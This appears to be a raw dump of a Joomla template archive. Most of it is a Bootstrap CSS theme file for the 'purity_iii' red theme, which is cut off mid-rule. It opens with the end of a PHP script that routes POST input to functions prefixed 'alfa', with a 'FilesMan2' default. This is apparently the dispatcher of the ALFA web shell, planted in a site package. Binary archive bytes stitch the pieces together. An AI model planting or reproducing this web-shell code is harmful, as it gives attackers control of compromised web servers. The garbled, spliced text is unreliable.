if(isset($default_action) && function_exists('alfa' . $default_action))
$_POST['a'] = $default_action;
else
$_POST['a'] = 'FilesMan2';
if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
call_user_func('alfa' . $_POST['a']);
exit;
?>PKӜ�\
�Q�ll'purity_iii/css/themes/red/bootstrap.cssnu&1i�html {
  font-family: sans-serif;
  -ms-text-size-adjust: 100%;
  -webkit-text-size-adjust: 100%;
}
body {
  margin: 0;
}
article,
aside,
details,
figcaption,
figure,
footer,
header,
hgroup,
main,
menu,
nav,
section,
summary {
  display: block;
}
audio,
canvas,
progress,
video {
  display: inline-block;
  vertical-align: baseline;
}
audio:not([controls]) {
  display: none;
  height: 0;
}
[hidden],
template {
  display: none;
}
a {
  background-color: transparent;
}
a:active,
a:hover {
  outline: 0;
}
abbr[title] {
  border-bottom: none;
  text-decoration: underline;
  text-decoration: underline dotted;
}
b,
strong {
  font-weight: bold;
}
dfn {
  font-style: italic;
}
h1 {
  font-size: 2em;
  margin: 0.67em 0;
}
mark {
  background: #ff0;
  color: #000;
}
small {
  font-size: 80%;
}
sub,
sup {
  font-size: 75%;
  line-height: 0;
  position: relative;
  vertical-align: baseline;
}
sup {
  top: -0.5em;
}
sub {
  bottom: -0.25em;
}
img {
  border: 0;
}
svg:not(:root) {
  overflow: hidden;
}
figure {
  margin: 1em 40px;
}
hr {
  box-sizing: content-box;
  height: 0;
}
pre {
  overflow: auto;
}
code,
kbd,
pre,
samp {
  font-family: monospace, monospace;
  font-size: 1em;
}
button,
input,
optgroup,
select,
textarea {
  color: inherit;
  font: inherit;
  margin: 0;
}
button {
  overflow: visible;
}
button,
select {
  text-transform: none;
}
button,
html input[type="button"],
input[type="reset"],
input[type="submit"] {
  -webkit-appearance: button;
  cursor: pointer;
}
button[disabled],
html input[disabled] {
  cursor: default;
}
button::-moz-focus-inner,
input::-moz-focus-inner {
  border: 0;
  padding: 0;
}
input {
  line-height: normal;
}
input[type="checkbox"],
input[type="radio"] {
  box-sizing: border-box;
  padding: 0;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  height: auto;
}
input[type="search"] {
  -webkit-appearance: textfield;
  box-sizing: content-box;
}
input[type="search"]::-webkit-search-cancel-button,
input[type="search"]::-webkit-search-decoration {
  -webkit-appearance: none;
}
fieldset {
  border: 1px solid #c0c0c0;
  margin: 0 2px;
  padding: 0.35em 0.625em 0.75em;
}
legend {
  border: 0;
  padding: 0;
}
textarea {
  overflow: auto;
}
optgroup {
  font-weight: bold;
}
table {
  border-collapse: collapse;
  border-spacing: 0;
}
td,
th {
  padding: 0;
}

@media print {
  *,
  *:before,
  *:after {
    color: #000 !important;
    text-shadow: none !important;
    background: transparent !important;
    box-shadow: none !important;
  }
  a,
  a:visited {
    text-decoration: underline;
  }
  a[href]:after {
    content: " (" attr(href) ")";
  }
  abbr[title]:after {
    content: " (" attr(title) ")";
  }
  a[href^="#"]:after,
  a[href^="javascript:"]:after {
    content: "";
  }
  pre,
  blockquote {
    border: 1px solid #999;
    page-break-inside: avoid;
  }
  thead {
    display: table-header-group;
  }
  tr,
  img {
    page-break-inside: avoid;
  }
  img {
    max-width: 100% !important;
  }
  p,
  h2,
  h3 {
    orphans: 3;
    widows: 3;
  }
  h2,
  h3 {
    page-break-after: avoid;
  }
  .navbar {
    display: none;
  }
  .btn > .caret,
  .dropup > .btn > .caret {
    border-top-color: #000 !important;
  }
  .label {
    border: 1px solid #000;
  }
  .table {
    border-collapse: collapse !important;
  }
  .table td,
  .table th {
    background-color: #fff !important;
  }
  .table-bordered th,
  .table-bordered td {
    border: 1px solid #ddd !important;
  }
}

* {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
*:before,
*:after {
  -webkit-box-sizing: border-box;
  -moz-box-sizing: border-box;
  box-sizing: border-box;
}
html {
  font-size: 10px;
  -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
}
body {
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-size: 14px;
  line-height: 1.42857143;
  color: #444444;
  background-color: #ffffff;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #cc0000;
  text-decoration: none;
}
a:hover,
a:focus {
  color: #800000;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
figure {
  margin: 0;
}
img {
  vertical-align: middle;
}
.img-responsive,
.thumbnail > img,
.thumbnail a > img,
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  display: block;
  max-width: 100%;
  height: auto;
}
.img-rounded {
  border-radius: 0;
}
.img-thumbnail {
  padding: 4px;
  line-height: 1.42857143;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0;
  -webkit-transition: all 0.2s ease-in-out;
  -o-transition: all 0.2s ease-in-out;
  transition: all 0.2s ease-in-out;
  display: inline-block;
  max-width: 100%;
  height: auto;
}
.img-circle {
  border-radius: 50%;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.sr-only {
  position: absolute;
  width: 1px;
  height: 1px;
  padding: 0;
  margin: -1px;
  overflow: hidden;
  clip: rect(0, 0, 0, 0);
  border: 0;
}
.sr-only-focusable:active,
.sr-only-focusable:focus {
  position: static;
  width: auto;
  height: auto;
  margin: 0;
  overflow: visible;
  clip: auto;
}
[role="button"] {
  cursor: pointer;
}

code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
code {
  padding: 2px 4px;
  font-size: 90%;
  color: #c7254e;
  background-color: #f9f2f4;
  border-radius: 0;
}
kbd {
  padding: 2px 4px;
  font-size: 90%;
  color: #ffffff;
  background-color: #333333;
  border-radius: 0;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.25);
}
kbd kbd {
  padding: 0;
  font-size: 100%;
  font-weight: 700;
  box-shadow: none;
}
pre {
  display: block;
  padding: 9.5px;
  margin: 0 0 10px;
  font-size: 13px;
  line-height: 1.42857143;
  color: #444444;
  word-break: break-all;
  word-wrap: break-word;
  background-color: #f5f5f5;
  border: 1px solid #cccccc;
  border-radius: 0;
}
pre code {
  padding: 0;
  font-size: inherit;
  color: inherit;
  white-space: pre-wrap;
  background-color: transparent;
  border-radius: 0;
}
.pre-scrollable {
  max-height: 340px;
  overflow-y: scroll;
}
.container {
  padding-right: 20px;
  padding-left: 20px;
  margin-right: auto;
  margin-left: auto;
}
@media (min-width: 768px) {
  .container {
    width: 760px;
  }
}
@media (min-width: 992px) {
  .container {
    width: 980px;
  }
}
@media (min-width: 1200px) {
  .container {
    width: 1180px;
  }
}
.container-fluid {
  padding-right: 20px;
  padding-left: 20px;
  margin-right: auto;
  margin-left: auto;
}
.row {
  margin-right: -20px;
  margin-left: -20px;
}
.row-no-gutters {
  margin-right: 0;
  margin-left: 0;
}
.row-no-gutters [class*="col-"] {
  padding-right: 0;
  padding-left: 0;
}
.col-xs-1, .col-sm-1, .col-md-1, .col-lg-1, .col-xs-2, .col-sm-2, .col-md-2, .col-lg-2, .col-xs-3, .col-sm-3, .col-md-3, .col-lg-3, .col-xs-4, .col-sm-4, .col-md-4, .col-lg-4, .col-xs-5, .col-sm-5, .col-md-5, .col-lg-5, .col-xs-6, .col-sm-6, .col-md-6, .col-lg-6, .col-xs-7, .col-sm-7, .col-md-7, .col-lg-7, .col-xs-8, .col-sm-8, .col-md-8, .col-lg-8, .col-xs-9, .col-sm-9, .col-md-9, .col-lg-9, .col-xs-10, .col-sm-10, .col-md-10, .col-lg-10, .col-xs-11, .col-sm-11, .col-md-11, .col-lg-11, .col-xs-12, .col-sm-12, .col-md-12, .col-lg-12 {
  position: relative;
  min-height: 1px;
  padding-right: 20px;
  padding-left: 20px;
}
.col-xs-1, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .col-xs-10, .col-xs-11, .col-xs-12 {
  float: left;
}
.col-xs-12 {
  width: 100%;
}
.col-xs-11 {
  width: 91.66666667%;
}
.col-xs-10 {
  width: 83.33333333%;
}
.col-xs-9 {
  width: 75%;
}
.col-xs-8 {
  width: 66.66666667%;
}
.col-xs-7 {
  width: 58.33333333%;
}
.col-xs-6 {
  width: 50%;
}
.col-xs-5 {
  width: 41.66666667%;
}
.col-xs-4 {
  width: 33.33333333%;
}
.col-xs-3 {
  width: 25%;
}
.col-xs-2 {
  width: 16.66666667%;
}
.col-xs-1 {
  width: 8.33333333%;
}
.col-xs-pull-12 {
  right: 100%;
}
.col-xs-pull-11 {
  right: 91.66666667%;
}
.col-xs-pull-10 {
  right: 83.33333333%;
}
.col-xs-pull-9 {
  right: 75%;
}
.col-xs-pull-8 {
  right: 66.66666667%;
}
.col-xs-pull-7 {
  right: 58.33333333%;
}
.col-xs-pull-6 {
  right: 50%;
}
.col-xs-pull-5 {
  right: 41.66666667%;
}
.col-xs-pull-4 {
  right: 33.33333333%;
}
.col-xs-pull-3 {
  right: 25%;
}
.col-xs-pull-2 {
  right: 16.66666667%;
}
.col-xs-pull-1 {
  right: 8.33333333%;
}
.col-xs-pull-0 {
  right: auto;
}
.col-xs-push-12 {
  left: 100%;
}
.col-xs-push-11 {
  left: 91.66666667%;
}
.col-xs-push-10 {
  left: 83.33333333%;
}
.col-xs-push-9 {
  left: 75%;
}
.col-xs-push-8 {
  left: 66.66666667%;
}
.col-xs-push-7 {
  left: 58.33333333%;
}
.col-xs-push-6 {
  left: 50%;
}
.col-xs-push-5 {
  left: 41.66666667%;
}
.col-xs-push-4 {
  left: 33.33333333%;
}
.col-xs-push-3 {
  left: 25%;
}
.col-xs-push-2 {
  left: 16.66666667%;
}
.col-xs-push-1 {
  left: 8.33333333%;
}
.col-xs-push-0 {
  left: auto;
}
.col-xs-offset-12 {
  margin-left: 100%;
}
.col-xs-offset-11 {
  margin-left: 91.66666667%;
}
.col-xs-offset-10 {
  margin-left: 83.33333333%;
}
.col-xs-offset-9 {
  margin-left: 75%;
}
.col-xs-offset-8 {
  margin-left: 66.66666667%;
}
.col-xs-offset-7 {
  margin-left: 58.33333333%;
}
.col-xs-offset-6 {
  margin-left: 50%;
}
.col-xs-offset-5 {
  margin-left: 41.66666667%;
}
.col-xs-offset-4 {
  margin-left: 33.33333333%;
}
.col-xs-offset-3 {
  margin-left: 25%;
}
.col-xs-offset-2 {
  margin-left: 16.66666667%;
}
.col-xs-offset-1 {
  margin-left: 8.33333333%;
}
.col-xs-offset-0 {
  margin-left: 0%;
}
@media (min-width: 768px) {
  .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-sm-10, .col-sm-11, .col-sm-12 {
    float: left;
  }
  .col-sm-12 {
    width: 100%;
  }
  .col-sm-11 {
    width: 91.66666667%;
  }
  .col-sm-10 {
    width: 83.33333333%;
  }
  .col-sm-9 {
    width: 75%;
  }
  .col-sm-8 {
    width: 66.66666667%;
  }
  .col-sm-7 {
    width: 58.33333333%;
  }
  .col-sm-6 {
    width: 50%;
  }
  .col-sm-5 {
    width: 41.66666667%;
  }
  .col-sm-4 {
    width: 33.33333333%;
  }
  .col-sm-3 {
    width: 25%;
  }
  .col-sm-2 {
    width: 16.66666667%;
  }
  .col-sm-1 {
    width: 8.33333333%;
  }
  .col-sm-pull-12 {
    right: 100%;
  }
  .col-sm-pull-11 {
    right: 91.66666667%;
  }
  .col-sm-pull-10 {
    right: 83.33333333%;
  }
  .col-sm-pull-9 {
    right: 75%;
  }
  .col-sm-pull-8 {
    right: 66.66666667%;
  }
  .col-sm-pull-7 {
    right: 58.33333333%;
  }
  .col-sm-pull-6 {
    right: 50%;
  }
  .col-sm-pull-5 {
    right: 41.66666667%;
  }
  .col-sm-pull-4 {
    right: 33.33333333%;
  }
  .col-sm-pull-3 {
    right: 25%;
  }
  .col-sm-pull-2 {
    right: 16.66666667%;
  }
  .col-sm-pull-1 {
    right: 8.33333333%;
  }
  .col-sm-pull-0 {
    right: auto;
  }
  .col-sm-push-12 {
    left: 100%;
  }
  .col-sm-push-11 {
    left: 91.66666667%;
  }
  .col-sm-push-10 {
    left: 83.33333333%;
  }
  .col-sm-push-9 {
    left: 75%;
  }
  .col-sm-push-8 {
    left: 66.66666667%;
  }
  .col-sm-push-7 {
    left: 58.33333333%;
  }
  .col-sm-push-6 {
    left: 50%;
  }
  .col-sm-push-5 {
    left: 41.66666667%;
  }
  .col-sm-push-4 {
    left: 33.33333333%;
  }
  .col-sm-push-3 {
    left: 25%;
  }
  .col-sm-push-2 {
    left: 16.66666667%;
  }
  .col-sm-push-1 {
    left: 8.33333333%;
  }
  .col-sm-push-0 {
    left: auto;
  }
  .col-sm-offset-12 {
    margin-left: 100%;
  }
  .col-sm-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-sm-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-sm-offset-9 {
    margin-left: 75%;
  }
  .col-sm-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-sm-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-sm-offset-6 {
    margin-left: 50%;
  }
  .col-sm-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-sm-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-sm-offset-3 {
    margin-left: 25%;
  }
  .col-sm-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-sm-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-sm-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 992px) {
  .col-md-1, .col-md-2, .col-md-3, .col-md-4, .col-md-5, .col-md-6, .col-md-7, .col-md-8, .col-md-9, .col-md-10, .col-md-11, .col-md-12 {
    float: left;
  }
  .col-md-12 {
    width: 100%;
  }
  .col-md-11 {
    width: 91.66666667%;
  }
  .col-md-10 {
    width: 83.33333333%;
  }
  .col-md-9 {
    width: 75%;
  }
  .col-md-8 {
    width: 66.66666667%;
  }
  .col-md-7 {
    width: 58.33333333%;
  }
  .col-md-6 {
    width: 50%;
  }
  .col-md-5 {
    width: 41.66666667%;
  }
  .col-md-4 {
    width: 33.33333333%;
  }
  .col-md-3 {
    width: 25%;
  }
  .col-md-2 {
    width: 16.66666667%;
  }
  .col-md-1 {
    width: 8.33333333%;
  }
  .col-md-pull-12 {
    right: 100%;
  }
  .col-md-pull-11 {
    right: 91.66666667%;
  }
  .col-md-pull-10 {
    right: 83.33333333%;
  }
  .col-md-pull-9 {
    right: 75%;
  }
  .col-md-pull-8 {
    right: 66.66666667%;
  }
  .col-md-pull-7 {
    right: 58.33333333%;
  }
  .col-md-pull-6 {
    right: 50%;
  }
  .col-md-pull-5 {
    right: 41.66666667%;
  }
  .col-md-pull-4 {
    right: 33.33333333%;
  }
  .col-md-pull-3 {
    right: 25%;
  }
  .col-md-pull-2 {
    right: 16.66666667%;
  }
  .col-md-pull-1 {
    right: 8.33333333%;
  }
  .col-md-pull-0 {
    right: auto;
  }
  .col-md-push-12 {
    left: 100%;
  }
  .col-md-push-11 {
    left: 91.66666667%;
  }
  .col-md-push-10 {
    left: 83.33333333%;
  }
  .col-md-push-9 {
    left: 75%;
  }
  .col-md-push-8 {
    left: 66.66666667%;
  }
  .col-md-push-7 {
    left: 58.33333333%;
  }
  .col-md-push-6 {
    left: 50%;
  }
  .col-md-push-5 {
    left: 41.66666667%;
  }
  .col-md-push-4 {
    left: 33.33333333%;
  }
  .col-md-push-3 {
    left: 25%;
  }
  .col-md-push-2 {
    left: 16.66666667%;
  }
  .col-md-push-1 {
    left: 8.33333333%;
  }
  .col-md-push-0 {
    left: auto;
  }
  .col-md-offset-12 {
    margin-left: 100%;
  }
  .col-md-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-md-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-md-offset-9 {
    margin-left: 75%;
  }
  .col-md-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-md-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-md-offset-6 {
    margin-left: 50%;
  }
  .col-md-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-md-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-md-offset-3 {
    margin-left: 25%;
  }
  .col-md-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-md-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-md-offset-0 {
    margin-left: 0%;
  }
}
@media (min-width: 1200px) {
  .col-lg-1, .col-lg-2, .col-lg-3, .col-lg-4, .col-lg-5, .col-lg-6, .col-lg-7, .col-lg-8, .col-lg-9, .col-lg-10, .col-lg-11, .col-lg-12 {
    float: left;
  }
  .col-lg-12 {
    width: 100%;
  }
  .col-lg-11 {
    width: 91.66666667%;
  }
  .col-lg-10 {
    width: 83.33333333%;
  }
  .col-lg-9 {
    width: 75%;
  }
  .col-lg-8 {
    width: 66.66666667%;
  }
  .col-lg-7 {
    width: 58.33333333%;
  }
  .col-lg-6 {
    width: 50%;
  }
  .col-lg-5 {
    width: 41.66666667%;
  }
  .col-lg-4 {
    width: 33.33333333%;
  }
  .col-lg-3 {
    width: 25%;
  }
  .col-lg-2 {
    width: 16.66666667%;
  }
  .col-lg-1 {
    width: 8.33333333%;
  }
  .col-lg-pull-12 {
    right: 100%;
  }
  .col-lg-pull-11 {
    right: 91.66666667%;
  }
  .col-lg-pull-10 {
    right: 83.33333333%;
  }
  .col-lg-pull-9 {
    right: 75%;
  }
  .col-lg-pull-8 {
    right: 66.66666667%;
  }
  .col-lg-pull-7 {
    right: 58.33333333%;
  }
  .col-lg-pull-6 {
    right: 50%;
  }
  .col-lg-pull-5 {
    right: 41.66666667%;
  }
  .col-lg-pull-4 {
    right: 33.33333333%;
  }
  .col-lg-pull-3 {
    right: 25%;
  }
  .col-lg-pull-2 {
    right: 16.66666667%;
  }
  .col-lg-pull-1 {
    right: 8.33333333%;
  }
  .col-lg-pull-0 {
    right: auto;
  }
  .col-lg-push-12 {
    left: 100%;
  }
  .col-lg-push-11 {
    left: 91.66666667%;
  }
  .col-lg-push-10 {
    left: 83.33333333%;
  }
  .col-lg-push-9 {
    left: 75%;
  }
  .col-lg-push-8 {
    left: 66.66666667%;
  }
  .col-lg-push-7 {
    left: 58.33333333%;
  }
  .col-lg-push-6 {
    left: 50%;
  }
  .col-lg-push-5 {
    left: 41.66666667%;
  }
  .col-lg-push-4 {
    left: 33.33333333%;
  }
  .col-lg-push-3 {
    left: 25%;
  }
  .col-lg-push-2 {
    left: 16.66666667%;
  }
  .col-lg-push-1 {
    left: 8.33333333%;
  }
  .col-lg-push-0 {
    left: auto;
  }
  .col-lg-offset-12 {
    margin-left: 100%;
  }
  .col-lg-offset-11 {
    margin-left: 91.66666667%;
  }
  .col-lg-offset-10 {
    margin-left: 83.33333333%;
  }
  .col-lg-offset-9 {
    margin-left: 75%;
  }
  .col-lg-offset-8 {
    margin-left: 66.66666667%;
  }
  .col-lg-offset-7 {
    margin-left: 58.33333333%;
  }
  .col-lg-offset-6 {
    margin-left: 50%;
  }
  .col-lg-offset-5 {
    margin-left: 41.66666667%;
  }
  .col-lg-offset-4 {
    margin-left: 33.33333333%;
  }
  .col-lg-offset-3 {
    margin-left: 25%;
  }
  .col-lg-offset-2 {
    margin-left: 16.66666667%;
  }
  .col-lg-offset-1 {
    margin-left: 8.33333333%;
  }
  .col-lg-offset-0 {
    margin-left: 0%;
  }
}
table {
  background-color: transparent;
}
table col[class*="col-"] {
  position: static;
  display: table-column;
  float: none;
}
table td[class*="col-"],
table th[class*="col-"] {
  position: static;
  display: table-cell;
  float: none;
}
caption {
  padding-top: 8px;
  padding-bottom: 8px;
  color: #999999;
  text-align: left;
}
th {
  text-align: left;
}
.table {
  width: 100%;
  max-width: 100%;
  margin-bottom: 20px;
}
.table > thead > tr > th,
.table > tbody > tr > th,
.table > tfoot > tr > th,
.table > thead > tr > td,
.table > tbody > tr > td,
.table > tfoot > tr > td {
  padding: 8px;
  line-height: 1.42857143;
  vertical-align: top;
  border-top: 1px solid #dddddd;
}
.table > thead > tr > th {
  vertical-align: bottom;
  border-bottom: 2px solid #dddddd;
}
.table > caption + thead > tr:first-child > th,
.table > colgroup + thead > tr:first-child > th,
.table > thead:first-child > tr:first-child > th,
.table > caption + thead > tr:first-child > td,
.table > colgroup + thead > tr:first-child > td,
.table > thead:first-child > tr:first-child > td {
  border-top: 0;
}
.table > tbody + tbody {
  border-top: 2px solid #dddddd;
}
.table .table {
  background-color: #ffffff;
}
.table-condensed > thead > tr > th,
.table-condensed > tbody > tr > th,
.table-condensed > tfoot > tr > th,
.table-condensed > thead > tr > td,
.table-condensed > tbody > tr > td,
.table-condensed > tfoot > tr > td {
  padding: 5px;
}
.table-bordered {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > tbody > tr > th,
.table-bordered > tfoot > tr > th,
.table-bordered > thead > tr > td,
.table-bordered > tbody > tr > td,
.table-bordered > tfoot > tr > td {
  border: 1px solid #dddddd;
}
.table-bordered > thead > tr > th,
.table-bordered > thead > tr > td {
  border-bottom-width: 2px;
}
.table-striped > tbody > tr:nth-of-type(odd) {
  background-color: #f9f9f9;
}
.table-hover > tbody > tr:hover {
  background-color: #f5f5f5;
}
.table > thead > tr > td.active,
.table > tbody > tr > td.active,
.table > tfoot > tr > td.active,
.table > thead > tr > th.active,
.table > tbody > tr > th.active,
.table > tfoot > tr > th.active,
.table > thead > tr.active > td,
.table > tbody > tr.active > td,
.table > tfoot > tr.active > td,
.table > thead > tr.active > th,
.table > tbody > tr.active > th,
.table > tfoot > tr.active > th {
  background-color: #f5f5f5;
}
.table-hover > tbody > tr > td.active:hover,
.table-hover > tbody > tr > th.active:hover,
.table-hover > tbody > tr.active:hover > td,
.table-hover > tbody > tr:hover > .active,
.table-hover > tbody > tr.active:hover > th {
  background-color: #e8e8e8;
}
.table > thead > tr > td.success,
.table > tbody > tr > td.success,
.table > tfoot > tr > td.success,
.table > thead > tr > th.success,
.table > tbody > tr > th.success,
.table > tfoot > tr > th.success,
.table > thead > tr.success > td,
.table > tbody > tr.success > td,
.table > tfoot > tr.success > td,
.table > thead > tr.success > th,
.table > tbody > tr.success > th,
.table > tfoot > tr.success > th {
  background-color: #dff0d8;
}
.table-hover > tbody > tr > td.success:hover,
.table-hover > tbody > tr > th.success:hover,
.table-hover > tbody > tr.success:hover > td,
.table-hover > tbody > tr:hover > .success,
.table-hover > tbody > tr.success:hover > th {
  background-color: #d0e9c6;
}
.table > thead > tr > td.info,
.table > tbody > tr > td.info,
.table > tfoot > tr > td.info,
.table > thead > tr > th.info,
.table > tbody > tr > th.info,
.table > tfoot > tr > th.info,
.table > thead > tr.info > td,
.table > tbody > tr.info > td,
.table > tfoot > tr.info > td,
.table > thead > tr.info > th,
.table > tbody > tr.info > th,
.table > tfoot > tr.info > th {
  background-color: #d9edf7;
}
.table-hover > tbody > tr > td.info:hover,
.table-hover > tbody > tr > th.info:hover,
.table-hover > tbody > tr.info:hover > td,
.table-hover > tbody > tr:hover > .info,
.table-hover > tbody > tr.info:hover > th {
  background-color: #c4e3f3;
}
.table > thead > tr > td.warning,
.table > tbody > tr > td.warning,
.table > tfoot > tr > td.warning,
.table > thead > tr > th.warning,
.table > tbody > tr > th.warning,
.table > tfoot > tr > th.warning,
.table > thead > tr.warning > td,
.table > tbody > tr.warning > td,
.table > tfoot > tr.warning > td,
.table > thead > tr.warning > th,
.table > tbody > tr.warning > th,
.table > tfoot > tr.warning > th {
  background-color: #fcf8e3;
}
.table-hover > tbody > tr > td.warning:hover,
.table-hover > tbody > tr > th.warning:hover,
.table-hover > tbody > tr.warning:hover > td,
.table-hover > tbody > tr:hover > .warning,
.table-hover > tbody > tr.warning:hover > th {
  background-color: #faf2cc;
}
.table > thead > tr > td.danger,
.table > tbody > tr > td.danger,
.table > tfoot > tr > td.danger,
.table > thead > tr > th.danger,
.table > tbody > tr > th.danger,
.table > tfoot > tr > th.danger,
.table > thead > tr.danger > td,
.table > tbody > tr.danger > td,
.table > tfoot > tr.danger > td,
.table > thead > tr.danger > th,
.table > tbody > tr.danger > th,
.table > tfoot > tr.danger > th {
  background-color: #f2dede;
}
.table-hover > tbody > tr > td.danger:hover,
.table-hover > tbody > tr > th.danger:hover,
.table-hover > tbody > tr.danger:hover > td,
.table-hover > tbody > tr:hover > .danger,
.table-hover > tbody > tr.danger:hover > th {
  background-color: #ebcccc;
}
.table-responsive {
  min-height: .01%;
  overflow-x: auto;
}
@media screen and (max-width: 767px) {
  .table-responsive {
    width: 100%;
    margin-bottom: 15px;
    overflow-y: hidden;
    -ms-overflow-style: -ms-autohiding-scrollbar;
    border: 1px solid #dddddd;
  }
  .table-responsive > .table {
    margin-bottom: 0;
  }
  .table-responsive > .table > thead > tr > th,
  .table-responsive > .table > tbody > tr > th,
  .table-responsive > .table > tfoot > tr > th,
  .table-responsive > .table > thead > tr > td,
  .table-responsive > .table > tbody > tr > td,
  .table-responsive > .table > tfoot > tr > td {
    white-space: nowrap;
  }
  .table-responsive > .table-bordered {
    border: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:first-child,
  .table-responsive > .table-bordered > tbody > tr > th:first-child,
  .table-responsive > .table-bordered > tfoot > tr > th:first-child,
  .table-responsive > .table-bordered > thead > tr > td:first-child,
  .table-responsive > .table-bordered > tbody > tr > td:first-child,
  .table-responsive > .table-bordered > tfoot > tr > td:first-child {
    border-left: 0;
  }
  .table-responsive > .table-bordered > thead > tr > th:last-child,
  .table-responsive > .table-bordered > tbody > tr > th:last-child,
  .table-responsive > .table-bordered > tfoot > tr > th:last-child,
  .table-responsive > .table-bordered > thead > tr > td:last-child,
  .table-responsive > .table-bordered > tbody > tr > td:last-child,
  .table-responsive > .table-bordered > tfoot > tr > td:last-child {
    border-right: 0;
  }
  .table-responsive > .table-bordered > tbody > tr:last-child > th,
  .table-responsive > .table-bordered > tfoot > tr:last-child > th,
  .table-responsive > .table-bordered > tbody > tr:last-child > td,
  .table-responsive > .table-bordered > tfoot > tr:last-child > td {
    border-bottom: 0;
  }
}
select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  color: #666666;
  background-color: #ffffff;
  background-image: none;
  border: 1px solid #cccccc;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
